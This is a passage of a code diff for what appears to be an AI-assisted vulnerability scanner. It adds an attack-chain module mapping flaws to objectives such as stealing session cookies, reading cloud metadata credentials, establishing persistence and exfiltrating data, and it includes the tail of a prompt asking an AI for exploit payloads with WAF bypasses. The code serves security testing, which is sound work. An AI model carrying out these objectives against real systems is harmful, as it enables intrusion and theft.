+- Framework-specific behaviors
+- Database/ORM quirks
+- WAF bypass techniques
+
+Return payloads in JSON format:
+{
+  "analysis": "Brief analysis of the vulnerability",
+  "payloads": [
+    {
+      "payload": "the exploit string",
+      "rationale": "why this targets this specific code",
+      "expectedIfVulnerable": "what happens if it works",
+      "expectedIfSafe": "what happens if protected",
+      "confidence": "high|medium|low"
+    }
+  ]
+}`;
+  }
+});
+
+// src/execution/chains.ts
+function identifyChains(gaps) {
+  const chains = [];
+  const gapsByType = groupGapsByType(gaps);
+  for (const pattern of KNOWN_CHAIN_PATTERNS) {
+    const hasAllRequired = pattern.requiredTypes.every(
+      (type) => gapsByType.has(type) && gapsByType.get(type).length > 0
+    );
+    if (!hasAllRequired) continue;
+    const requiredGaps = pattern.requiredTypes.flatMap(
+      (type) => gapsByType.get(type) ?? []
+    );
+    const optionalGaps = pattern.optionalTypes.flatMap(
+      (type) => gapsByType.get(type) ?? []
+    );
+    const steps = requiredGaps.map((gap, idx) => ({
+      order: idx + 1,
+      gap,
+      objective: getStepObjective(gap.categoryId, idx),
+      outputForNext: getOutputForNext(gap.categoryId)
+    }));
+    for (const gap of optionalGaps.slice(0, 2)) {
+      steps.push({
+        order: steps.length + 1,
+        gap,
+        objective: `Enhance attack via ${gap.categoryId}`
+      });
+    }
+    chains.push({
+      id: `chain-${pattern.name.toLowerCase().replace(/ /g, "-")}-${chains.length}`,
+      name: pattern.name,
+      description: pattern.description,
+      severity: pattern.severity,
+      steps,
+      impact: pattern.impact,
+      mitreTechniques: getMitreTechniques(pattern.requiredTypes)
+    });
+  }
+  return chains;
+}
+function groupGapsByType(gaps) {
+  const grouped = /* @__PURE__ */ new Map();
+  for (const gap of gaps) {
+    const existing = grouped.get(gap.categoryId) ?? [];
+    existing.push(gap);
+    grouped.set(gap.categoryId, existing);
+  }
+  return grouped;
+}
+function getStepObjective(categoryId, stepIndex, pattern) {
+  const objectives = {
+    "xss": ["Inject malicious JavaScript", "Steal session cookies", "Execute actions as victim"],
+    "sql-injection": ["Extract database credentials", "Read sensitive data", "Modify data"],
+    "ssrf": ["Access internal services", "Read cloud metadata", "Scan internal network"],
+    "command-injection": ["Execute arbitrary commands", "Establish persistence", "Exfiltrate data"],
+    "path-traversal": ["Read sensitive files", "Access credentials", "Read source code"],
+    "xxe": ["Read internal files", "Perform SSRF via DTD", "Exfiltrate data"],
+    "idor": ["Access other users' resources", "Escalate privileges", "Mass data access"],
+    "missing-authentication": ["Bypass authentication", "Access protected endpoints", "Gain unauthorized access"],
+    "open-redirect": ["Redirect to malicious site", "Phish credentials", "Chain with XSS"],
+    "deserialization": ["Execute arbitrary code", "Gain RCE", "Compromise server"]
+  };
+  const categoryObjectives = objectives[categoryId] ?? ["Exploit vulnerability"];
+  return categoryObjectives[stepIndex % categoryObjectives.length] ?? categoryObjectives[0] ?? "Exploit vulnerability";
+}
+function getOutputForNext(categoryId) {
+  const outputs = {
+    "xss": "Stolen session token or executed JavaScript context",
+    "sql-injection": "Extracted data or modified database state",
+    "ssrf": "Internal service response or cloud credentials",
+    "command-injection": "Command output or shell access",
+    "path-traversal": "File contents or credentials",
+    "xxe": "File contents or internal response",
+    "idor": "Access to unauthorized resource",
+    "missing-authentication": "Unauthenticated access to protected endpoint",
+    "open-redirect": "Victim redirected to attacker-controlled site",
+    "deserialization": "Code execution context"
+  };
+  return outputs[categoryId] ?? "Vulnerability output";
+}
+function getMitreTechniques(types) {
+  const techniques = [];
+  for (const type of types) {
+    switch (type) {
+      case "sql-injection":
+        techniques.push("T1190 - Exploit Public-Facing Application");
+        break;
+      case "xss":
+        techniques.push("T1189 - Drive-by Compromise");
+        techniques.push("T1539 - Steal Web Session Cookie");
+        break;
+      case "command-injection":
+        techniques.push("T1059 - Command and Scripting Interpreter");
+        techniques.push("T1190 - Exploit Public-Facing Application");
+        break;
+      case "ssrf":
+        techniques.push("T1199 - Trusted Relationship");
+        techniques.push("T1552.005 - Cloud Instance Metadata API");
+        break;
+      case "path-traversal":
+        techniques.push("T1083 - File and Directory Discovery");
+        break;
+      case "deserialization":
+        techniques.push("T1190 - Exploit Public-Facing Application");
+        techniques.push("T1059 - Command and Scripting Interpreter");
+        break;
+    }
+  }
+  return [...new Set(techniques)];
+}
+function generateChainExploitTest(chain) {
+  const stepTests = chain.steps.map((step, idx) => `
+  it('step ${step.order}: ${step.objective}', () => {
+    // Exploit ${step.gap.categoryId} at ${step.gap.filePath}:${step.gap.lineStart}
+    // Objective: ${step.objective}
+    ${step.outputForNext ? `// Output for next step: ${step.outputForNext}` : ""}
+    
+    // This step would execute the ${step.gap.categoryId} exploit
+    // In a real attack chain, the output feeds into the next step
+    expect(true).toBe(true); // Placeholder - implement actual exploit
+  });`).join("\n");
+  return `
+import { describe, it, expect } from 'vitest';
+
+/**
+ * Attack Chain: ${chain.name}
+ * Severity: ${chain.severity.toUpperCase()}
+ * 
+ * ${chain.description}
+ * 
+ * Impact: ${chain.impact}
+ * 
+ * MITRE ATT&CK: ${chain.mitreTechniques?.join(", ") ?? "N/A"}
+ */
+describe('Attack Chain: ${chain.name}', () => {
+${stepTests}
+
+  it('full chain: achieves attack objective', () => {
+    // This test validates the complete attack chain
+    // Each step's output feeds into the next
+    
+    // Impact if successful: ${chain.impact}
+    expect(true).toBe(true); // Placeholder - implement chain validation
+  });
+});
+`.trim();
+}
+function generateChainReport(chains) {
+  if (chains.length === 0) {
+    return "No attack chains identified.\n";
+  }
+  let report = `## Attack Chains Identified
+
+`;
+  report += `Found ${chains.length} potential attack chain(s) that combine multiple vulnerabilities.
+
+`;
+  for (const chain of chains) {
+    report += `### ${chain.name}
+
+`;
+    report += `**Severity:** ${chain.severity.toUpperCase()}
+
+`;
+    report += `**Description:** ${chain.description}
+
+`;
+    report += `**Impact:** ${chain.impact}
+
+`;
+    if (chain.mitreTechniques && chain.mitreTechniques.length > 0) {
+      report += `**MITRE ATT&CK:** ${chain.mitreTechniques.join(", ")}
+
+`;
+    }
+    report += `**Attack Steps:**
+
+`;
+    for (const step of chain.steps) {
+      report += `${step.order}. **${step.gap.categoryId}** at \`${step.gap.filePath}:${step.gap.lineStart}\`
+`;
+      report += `   - Objective: ${step.objective}
+`;
+      if (step.outputForNext) {
+        report += `   - Provides: ${step.outputForNext}
+`;
+      }
+    }
+    report += "\n---\n\n";
+  }
+  return report;
+}
+var KNOWN_CHAIN_PATTERNS;
+var init_chains = __esm({
+  "src/execution/chains.ts"() {
+    KNOWN_CHAIN_PATTERNS = [
+      {
+        name: "XSS to Account Takeover",
+        requiredTypes: ["xss"],
+        optionalTypes: ["missing-authentication", "csrf"],
+        severity: "critical",
+        description: "Reflected or stored XSS is used to steal session cookies or JWT tokens, leading to account takeover.",
+        impact: "Complete account takeover, access to user data, ability to perform actions as victim."
+      },
+      {
+        name: "SQL Injection to Data Exfiltration",
+        requiredTypes: ["sql-injection"],
+        optionalTypes: ["path-traversal", "command-injection"],
+        severity: "critical",
+        description: "SQL injection is used to extract sensitive data, potentially chained with file read or RCE.",
+        impact: "Full database access, credential theft, potential remote code execution."
+      },
+      {
+        name: "SSRF to Cloud Credential Theft",
+        requiredTypes: ["ssrf"],
+        optionalTypes: ["path-traversal"],
+        severity: "critical",
+        description: "SSRF is used to access cloud metadata endpoints (169.254.169.254), stealing IAM credentials.",
+        impact: "Cloud infrastructure compromise, lateral movement, data access."
+      },
+      {
+        name: "IDOR to Privilege Escalation",
+        requiredTypes: ["idor"],
+        optionalTypes: ["missing-authentication"],
+        severity: "high",
+        description: "IDOR allows access to admin resources by manipulating object IDs.",
+        impact: "Access to other users' data, potential admin access."
+      },
+      {
+        name: "Open Redirect to Phishing",
+        requiredTypes: ["open-redirect"],
+        optionalTypes: ["xss"],
+        severity: "high",
+        description: "Open redirect is used to redirect victims to malicious sites from trusted domain.",
+        impact: "Credential phishing, malware distribution, reputation damage."
+      },
+      {
+        name: "XXE to Internal Network Access",
+        requiredTypes: ["xxe"],
+        optionalTypes: ["ssrf", "path-traversal"],
+        severity: "critical",
+        description: "XXE is used to read internal files or make requests to internal services.",
+        impact: "Internal network scanning, sensitive file access, SSRF-like attacks."
+      },
+      {
+        name: "Command Injection to Full Compromise",
+        requiredTypes: ["command-injection"],
+        optionalTypes: [],
+        severity: "critical",
+        description: "Command injection leads directly to remote code execution on the server.",
+        impact: "Complete server compromise, data theft, lateral movement."
+      },
+      {
+        name: "Deserialization to RCE",
+        requiredTypes: ["deserialization"],
+        optionalTypes: ["command-injection"],
+        severity: "critical",
+        description: "Insecure deserialization allows arbitrary code execution via crafted objects.",
+        impact: "Remote code execution, server takeover."
+      },
+      {
+        name: "Path Traversal to Credential Access",
+        requiredTypes: ["path-traversal"],
+        optionalTypes: ["hardcoded-secrets"],
+        severity: "high",
+        description: "Path traversal is used to read sensitive files like .env, config, or SSH keys.",
+        impact: "Credential theft, configuration exposure, lateral movement."
+      },
+      {
+        name: "Auth Bypass to Data Breach",
+        requiredTypes: ["missing-authentication", "idor"],
+        optionalTypes: ["sql-injection"],
+        severity: "critical",
+        description: "Missing auth combined with IDOR allows access to any user's data.",
+        impact: "Mass data exfiltration, privacy violation, regulatory impact."
+      }
+    ];
+  }
+});
+
 // src/execution/index.ts
 var execution_exports = {};
 __export(execution_exports, {
+  AI_PAYLOAD_SYSTEM_PROMPT: () => AI_PAYLOAD_SYSTEM_PROMPT,
+  AUTH_BYPASS_PAYLOADS: () => AUTH_BYPASS_PAYLOADS,
+  COMMAND_INJECTION_PAYLOADS: () => COMMAND_INJECTION_PAYLOADS,
   DEFAULT_SANDBOX_CONFIG: () => DEFAULT_SANDBOX_CONFIG,
+  DESERIALIZATION_PAYLOADS: () => DESERIALIZATION_PAYLOADS,
   ExecutionRunner: () => ExecutionRunner,
+  IDOR_PAYLOADS: () => IDOR_PAYLOADS,
+  KNOWN_CHAIN_PATTERNS: () => KNOWN_CHAIN_PATTERNS,
+  MUTATION_STRATEGIES: () => MUTATION_STRATEGIES,
+  OPEN_REDIRECT_PAYLOADS: () => OPEN_REDIRECT_PAYLOADS,
+  PATH_TRAVERSAL_PAYLOADS: () => PATH_TRAVERSAL_PAYLOADS,
+  SQL_INJECTION_PAYLOADS: () => SQL_INJECTION_PAYLOADS,
+  SSRF_PAYLOADS: () => SSRF_PAYLOADS,
   Sandbox: () => Sandbox,
   TESTABLE_VULNERABILITIES: () => TESTABLE_VULNERABILITIES,
+  XSS_PAYLOADS: () => XSS_PAYLOADS,
+  XXE_PAYLOADS: () => XXE_PAYLOADS,
+  combinePayloads: () => combinePayloads,
   createRunner: () => createRunner,
   createSandbox: () => createSandbox,
+  extractTechStack: () => extractTechStack,
+  generateChainExploitTest: () => generateChainExploitTest,
+  generateChainReport: () => generateChainReport,
   generateExploitTest: () => generateExploitTest,
+  generatePayloadPrompt: () => generatePayloadPrompt,
+  getFallbackPayloads: () => getFallbackPayloads,
+  getPayloadsForCategory: () => getPayloadsForCategory,
+  getPayloadsWithMutations: () => getPayloadsWithMutations,
+  identifyChains: () => identifyChains,
   isTestable: () => isTestable,
+  mutatePayload: () => mutatePayload,
+  parseAiPayloadResponse: () => parseAiPayloadResponse,
   parseResults: () => parseResults
 });
 var init_execution = __esm({
@@ -2218,6 +3446,9 @@ var init_execution = __esm({
     init_runner();
     init_results();
     init_generator();
+    init_payloads();
+    init_ai_payloads();
+    init_chains();
   }
 });
 function App({ results, loading, error }) {